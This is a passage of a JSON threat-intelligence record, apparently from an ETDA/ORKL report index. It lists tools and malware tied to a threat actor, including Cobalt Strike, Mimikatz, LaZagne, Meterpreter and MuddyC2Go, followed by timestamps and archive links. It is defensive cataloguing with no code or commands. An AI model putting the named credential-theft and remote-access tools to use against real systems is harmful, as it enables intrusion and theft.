"CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434427, "ts_updated_at": 1775792062, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.pdf", "text": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.txt", "img": "https://archive.orkl.eu/973a3d9c5b01a7d62278b4dcd5ad72efd7c36819.jpg" } }